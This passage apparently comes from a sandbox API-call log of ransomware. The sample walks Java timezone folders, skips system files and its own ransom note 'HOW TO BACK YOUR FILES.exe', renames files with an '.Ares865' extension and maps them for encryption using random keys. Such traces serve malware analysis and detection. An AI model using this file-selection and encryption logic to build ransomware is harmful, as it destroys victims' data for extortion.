cAlternateFileName="")) returned 1 [0133.004] lstrcmpiW (lpString1="Atlantic", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.004] lstrcmpiW (lpString1="Atlantic", lpString2="aoldtz.exe") returned 1 [0133.004] lstrcmpiW (lpString1="Atlantic", lpString2=".") returned 1 [0133.004] lstrcmpiW (lpString1="Atlantic", lpString2="..") returned 1 [0133.004] lstrcmpiW (lpString1="Atlantic", lpString2="windows") returned -1 [0133.004] lstrcmpiW (lpString1="Atlantic", lpString2="bootmgr") returned -1 [0133.004] lstrcmpiW (lpString1="Atlantic", lpString2="temp") returned -1 [0133.004] lstrcmpiW (lpString1="Atlantic", lpString2="pagefile.sys") returned -1 [0133.004] lstrcmpiW (lpString1="Atlantic", lpString2="boot") returned -1 [0133.004] lstrcmpiW (lpString1="Atlantic", lpString2="ids.txt") returned -1 [0133.004] lstrcmpiW (lpString1="Atlantic", lpString2="ntuser.dat") returned -1 [0133.005] lstrcmpiW (lpString1="Atlantic", lpString2="perflogs") returned -1 [0133.005] lstrcmpiW (lpString1="Atlantic", lpString2="MSBuild") returned -1 [0133.005] lstrlenW (lpString="Atlantic") returned 8 [0133.005] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia") returned 44 [0133.005] lstrcpyW (in: lpString1=0x2cce450, lpString2="Atlantic" | out: lpString1="Atlantic") returned="Atlantic" [0133.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0133.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x62) returned 0x2d2f60 [0133.005] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0133.005] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74613b80, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52b13ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52b13ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Australia", cAlternateFileName="AUSTRA~1")) returned 1 [0133.005] lstrcmpiW (lpString1="Australia", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.005] lstrcmpiW (lpString1="Australia", lpString2="aoldtz.exe") returned 1 [0133.005] lstrcmpiW (lpString1="Australia", lpString2=".") returned 1 [0133.005] lstrcmpiW (lpString1="Australia", lpString2="..") returned 1 [0133.005] lstrcmpiW (lpString1="Australia", lpString2="windows") returned -1 [0133.005] lstrcmpiW (lpString1="Australia", lpString2="bootmgr") returned -1 [0133.005] lstrcmpiW (lpString1="Australia", lpString2="temp") returned -1 [0133.005] lstrcmpiW (lpString1="Australia", lpString2="pagefile.sys") returned -1 [0133.005] lstrcmpiW (lpString1="Australia", lpString2="boot") returned -1 [0133.005] lstrcmpiW (lpString1="Australia", lpString2="ids.txt") returned -1 [0133.005] lstrcmpiW (lpString1="Australia", lpString2="ntuser.dat") returned -1 [0133.005] lstrcmpiW (lpString1="Australia", lpString2="perflogs") returned -1 [0133.005] lstrcmpiW (lpString1="Australia", lpString2="MSBuild") returned -1 [0133.005] lstrlenW (lpString="Australia") returned 9 [0133.005] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic") returned 48 [0133.005] lstrcpyW (in: lpString1=0x2cce450, lpString2="Australia" | out: lpString1="Australia") returned="Australia" [0133.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7808 [0133.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x64) returned 0x2d2fd0 [0133.005] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7810 | out: ListHead=0x2e7710, ListEntry=0x2e7810) returned 0x2e7c30 [0133.005] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74639ce0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x74639ce0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x74639ce0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CET", cAlternateFileName="")) returned 1 [0133.005] lstrcmpiW (lpString1="CET", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.005] lstrcmpiW (lpString1="CET", lpString2="aoldtz.exe") returned 1 [0133.005] lstrcmpiW (lpString1="CET", lpString2=".") returned 1 [0133.005] lstrcmpiW (lpString1="CET", lpString2="..") returned 1 [0133.005] lstrcmpiW (lpString1="CET", lpString2="windows") returned -1 [0133.006] lstrcmpiW (lpString1="CET", lpString2="bootmgr") returned 1 [0133.006] lstrcmpiW (lpString1="CET", lpString2="temp") returned -1 [0133.006] lstrcmpiW (lpString1="CET", lpString2="pagefile.sys") returned -1 [0133.006] lstrcmpiW (lpString1="CET", lpString2="boot") returned 1 [0133.006] lstrcmpiW (lpString1="CET", lpString2="ids.txt") returned -1 [0133.006] lstrcmpiW (lpString1="CET", lpString2="ntuser.dat") returned -1 [0133.006] lstrcmpiW (lpString1="CET", lpString2="perflogs") returned -1 [0133.006] lstrcmpiW (lpString1="CET", lpString2="MSBuild") returned -1 [0133.006] lstrlenW (lpString="CET") returned 3 [0133.006] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia") returned 49 [0133.006] lstrcpyW (in: lpString1=0x2cce450, lpString2="CET" | out: lpString1="CET") returned="CET" [0133.006] lstrlenW (lpString="CET") returned 3 [0133.006] lstrlenW (lpString="Ares865") returned 7 [0133.006] lstrlenW (lpString=".dll") returned 4 [0133.006] lstrlenW (lpString=".lnk") returned 4 [0133.006] lstrlenW (lpString=".ini") returned 4 [0133.006] lstrlenW (lpString=".sys") returned 4 [0133.006] lstrlenW (lpString="CET") returned 3 [0133.006] lstrlenW (lpString="bak") returned 3 [0133.006] lstrlenW (lpString="ba_") returned 3 [0133.006] lstrlenW (lpString="dbb") returned 3 [0133.006] lstrlenW (lpString="vmdk") returned 4 [0133.006] lstrlenW (lpString="rar") returned 3 [0133.006] lstrlenW (lpString="zip") returned 3 [0133.006] lstrlenW (lpString="tgz") returned 3 [0133.006] lstrlenW (lpString="vbox") returned 4 [0133.006] lstrlenW (lpString="vdi") returned 3 [0133.006] lstrlenW (lpString="vhd") returned 3 [0133.006] lstrlenW (lpString="vhdx") returned 4 [0133.006] lstrlenW (lpString="avhd") returned 4 [0133.006] lstrlenW (lpString="db") returned 2 [0133.007] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CET.Ares865") returned 51 [0133.007] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CET" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cet"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CET.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cet.ares865"), dwFlags=0x1) returned 1 [0133.022] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CET.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cet.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.022] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1184) returned 1 [0133.023] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.024] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.024] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.024] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x170 [0133.026] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x190000 [0133.027] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.028] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.028] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.029] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74639ce0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x74639ce0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x74639ce0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CST6CDT", cAlternateFileName="")) returned 1 [0133.029] lstrcmpiW (lpString1="CST6CDT", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.029] lstrcmpiW (lpString1="CST6CDT", lpString2="aoldtz.exe") returned 1 [0133.029] lstrcmpiW (lpString1="CST6CDT", lpString2=".") returned 1 [0133.029] lstrcmpiW (lpString1="CST6CDT", lpString2="..") returned 1 [0133.029] lstrcmpiW (lpString1="CST6CDT", lpString2="windows") returned -1 [0133.029] lstrcmpiW (lpString1="CST6CDT", lpString2="bootmgr") returned 1 [0133.029] lstrcmpiW (lpString1="CST6CDT", lpString2="temp") returned -1 [0133.029] lstrcmpiW (lpString1="CST6CDT", lpString2="pagefile.sys") returned -1 [0133.029] lstrcmpiW (lpString1="CST6CDT", lpString2="boot") returned 1 [0133.029] lstrcmpiW (lpString1="CST6CDT", lpString2="ids.txt") returned -1 [0133.029] lstrcmpiW (lpString1="CST6CDT", lpString2="ntuser.dat") returned -1 [0133.029] lstrcmpiW (lpString1="CST6CDT", lpString2="perflogs") returned -1 [0133.029] lstrcmpiW (lpString1="CST6CDT", lpString2="MSBuild") returned -1 [0133.029] lstrlenW (lpString="CST6CDT") returned 7 [0133.030] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CET") returned 43 [0133.030] lstrcpyW (in: lpString1=0x2cce450, lpString2="CST6CDT" | out: lpString1="CST6CDT") returned="CST6CDT" [0133.030] lstrlenW (lpString="CST6CDT") returned 7 [0133.030] lstrlenW (lpString="Ares865") returned 7 [0133.030] lstrlenW (lpString=".dll") returned 4 [0133.030] lstrcmpiW (lpString1="CST6CDT", lpString2=".dll") returned 1 [0133.030] lstrlenW (lpString=".lnk") returned 4 [0133.030] lstrcmpiW (lpString1="CST6CDT", lpString2=".lnk") returned 1 [0133.030] lstrlenW (lpString=".ini") returned 4 [0133.030] lstrcmpiW (lpString1="CST6CDT", lpString2=".ini") returned 1 [0133.030] lstrlenW (lpString=".sys") returned 4 [0133.030] lstrcmpiW (lpString1="CST6CDT", lpString2=".sys") returned 1 [0133.030] lstrlenW (lpString="CST6CDT") returned 7 [0133.030] lstrlenW (lpString="bak") returned 3 [0133.030] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CST6CDT.Ares865") returned 55 [0133.030] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CST6CDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cst6cdt"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CST6CDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cst6cdt.ares865"), dwFlags=0x1) returned 1 [0133.032] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CST6CDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cst6cdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.032] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1272) returned 1 [0133.033] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.033] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.033] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.034] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x170 [0133.035] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x190000 [0133.036] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.037] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.037] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.037] lstrcpyW (in: lpString1=0x2cce450, lpString2="EET" | out: lpString1="EET") returned="EET" [0133.037] lstrlenW (lpString="EET") returned 3 [0133.037] lstrlenW (lpString="Ares865") returned 7 [0133.037] lstrlenW (lpString=".dll") returned 4 [0133.037] lstrlenW (lpString=".lnk") returned 4 [0133.037] lstrlenW (lpString=".ini") returned 4 [0133.037] lstrlenW (lpString=".sys") returned 4 [0133.037] lstrlenW (lpString="EET") returned 3 [0133.037] lstrlenW (lpString="bak") returned 3 [0133.037] lstrlenW (lpString="ba_") returned 3 [0133.037] lstrlenW (lpString="dbb") returned 3 [0133.037] lstrlenW (lpString="vmdk") returned 4 [0133.037] lstrlenW (lpString="rar") returned 3 [0133.038] lstrlenW (lpString="zip") returned 3 [0133.038] lstrlenW (lpString="tgz") returned 3 [0133.038] lstrlenW (lpString="vbox") returned 4 [0133.038] lstrlenW (lpString="vdi") returned 3 [0133.038] lstrlenW (lpString="vhd") returned 3 [0133.038] lstrlenW (lpString="vhdx") returned 4 [0133.038] lstrlenW (lpString="avhd") returned 4 [0133.038] lstrlenW (lpString="db") returned 2 [0133.038] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EET.Ares865") returned 51 [0133.038] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EET" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\eet"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EET.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\eet.ares865"), dwFlags=0x1) returned 1 [0133.040] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EET.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\eet.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.040] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1072) returned 1 [0133.040] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.041] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.041] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.041] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x170 [0133.043] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x190000 [0133.044] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.044] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.044] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.045] lstrcpyW (in: lpString1=0x2cce450, lpString2="EST" | out: lpString1="EST") returned="EST" [0133.045] lstrlenW (lpString="EST") returned 3 [0133.045] lstrlenW (lpString="Ares865") returned 7 [0133.045] lstrlenW (lpString=".dll") returned 4 [0133.045] lstrlenW (lpString=".lnk") returned 4 [0133.045] lstrlenW (lpString=".ini") returned 4 [0133.045] lstrlenW (lpString=".sys") returned 4 [0133.045] lstrlenW (lpString="EST") returned 3 [0133.045] lstrlenW (lpString="bak") returned 3 [0133.045] lstrlenW (lpString="ba_") returned 3 [0133.045] lstrlenW (lpString="dbb") returned 3 [0133.045] lstrlenW (lpString="vmdk") returned 4 [0133.045] lstrlenW (lpString="rar") returned 3 [0133.045] lstrlenW (lpString="zip") returned 3 [0133.045] lstrlenW (lpString="tgz") returned 3 [0133.045] lstrlenW (lpString="vbox") returned 4 [0133.045] lstrlenW (lpString="vdi") returned 3 [0133.045] lstrlenW (lpString="vhd") returned 3 [0133.045] lstrlenW (lpString="vhdx") returned 4 [0133.045] lstrlenW (lpString="avhd") returned 4 [0133.046] lstrlenW (lpString="db") returned 2 [0133.046] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST.Ares865") returned 51 [0133.046] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est.ares865"), dwFlags=0x1) returned 1 [0133.048] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.048] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0133.048] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.049] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.049] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.049] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x170 [0133.051] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0133.051] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.052] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.052] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.053] lstrcpyW (in: lpString1=0x2cce450, lpString2="EST5EDT" | out: lpString1="EST5EDT") returned="EST5EDT" [0133.053] lstrlenW (lpString="EST5EDT") returned 7 [0133.053] lstrlenW (lpString="Ares865") returned 7 [0133.053] lstrlenW (lpString=".dll") returned 4 [0133.053] lstrcmpiW (lpString1="EST5EDT", lpString2=".dll") returned 1 [0133.053] lstrlenW (lpString=".lnk") returned 4 [0133.053] lstrcmpiW (lpString1="EST5EDT", lpString2=".lnk") returned 1 [0133.053] lstrlenW (lpString=".ini") returned 4 [0133.053] lstrcmpiW (lpString1="EST5EDT", lpString2=".ini") returned 1 [0133.053] lstrlenW (lpString=".sys") returned 4 [0133.053] lstrcmpiW (lpString1="EST5EDT", lpString2=".sys") returned 1 [0133.053] lstrlenW (lpString="EST5EDT") returned 7 [0133.053] lstrlenW (lpString="bak") returned 3 [0133.053] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST5EDT.Ares865") returned 55 [0133.053] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST5EDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est5edt"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST5EDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est5edt.ares865"), dwFlags=0x1) returned 1 [0133.055] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST5EDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est5edt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.055] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1272) returned 1 [0133.055] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.056] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.056] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.056] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x170 [0133.060] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x190000 [0133.060] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.061] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.061] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.062] lstrcpyW (in: lpString1=0x2cce450, lpString2="Etc" | out: lpString1="Etc") returned="Etc" [0133.062] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e77c8 [0133.062] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x58) returned 0x2dfa70 [0133.062] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e77d0 | out: ListHead=0x2e7710, ListEntry=0x2e77d0) returned 0x2e7810 [0133.062] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7465fe40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52aedd40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52aedd40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Europe", cAlternateFileName="")) returned 1 [0133.062] lstrcmpiW (lpString1="Europe", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.062] lstrcmpiW (lpString1="Europe", lpString2="aoldtz.exe") returned 1 [0133.062] lstrcmpiW (lpString1="Europe", lpString2=".") returned 1 [0133.062] lstrcmpiW (lpString1="Europe", lpString2="..") returned 1 [0133.062] lstrcmpiW (lpString1="Europe", lpString2="windows") returned -1 [0133.062] lstrcmpiW (lpString1="Europe", lpString2="bootmgr") returned 1 [0133.062] lstrcmpiW (lpString1="Europe", lpString2="temp") returned -1 [0133.062] lstrcmpiW (lpString1="Europe", lpString2="pagefile.sys") returned -1 [0133.062] lstrcmpiW (lpString1="Europe", lpString2="boot") returned 1 [0133.062] lstrcmpiW (lpString1="Europe", lpString2="ids.txt") returned -1 [0133.062] lstrcmpiW (lpString1="Europe", lpString2="ntuser.dat") returned -1 [0133.062] lstrcmpiW (lpString1="Europe", lpString2="perflogs") returned -1 [0133.062] lstrcmpiW (lpString1="Europe", lpString2="MSBuild") returned -1 [0133.062] lstrlenW (lpString="Europe") returned 6 [0133.062] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc") returned 43 [0133.062] lstrcpyW (in: lpString1=0x2cce450, lpString2="Europe" | out: lpString1="Europe") returned="Europe" [0133.062] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7788 [0133.062] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5e) returned 0x2f22a0 [0133.063] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7790 | out: ListHead=0x2e7710, ListEntry=0x2e7790) returned 0x2e77d0 [0133.063] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74685fa0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x74685fa0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x74685fa0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GMT", cAlternateFileName="")) returned 1 [0133.063] lstrcmpiW (lpString1="GMT", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.063] lstrcmpiW (lpString1="GMT", lpString2="aoldtz.exe") returned 1 [0133.063] lstrcmpiW (lpString1="GMT", lpString2=".") returned 1 [0133.063] lstrcmpiW (lpString1="GMT", lpString2="..") returned 1 [0133.063] lstrcmpiW (lpString1="GMT", lpString2="windows") returned -1 [0133.063] lstrcmpiW (lpString1="GMT", lpString2="bootmgr") returned 1 [0133.063] lstrcmpiW (lpString1="GMT", lpString2="temp") returned -1 [0133.063] lstrcmpiW (lpString1="GMT", lpString2="pagefile.sys") returned -1 [0133.063] lstrcmpiW (lpString1="GMT", lpString2="boot") returned 1 [0133.063] lstrcmpiW (lpString1="GMT", lpString2="ids.txt") returned -1 [0133.063] lstrcmpiW (lpString1="GMT", lpString2="ntuser.dat") returned -1 [0133.063] lstrcmpiW (lpString1="GMT", lpString2="perflogs") returned -1 [0133.063] lstrcmpiW (lpString1="GMT", lpString2="MSBuild") returned -1 [0133.063] lstrlenW (lpString="GMT") returned 3 [0133.063] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe") returned 46 [0133.063] lstrcpyW (in: lpString1=0x2cce450, lpString2="GMT" | out: lpString1="GMT") returned="GMT" [0133.063] lstrlenW (lpString="GMT") returned 3 [0133.063] lstrlenW (lpString="Ares865") 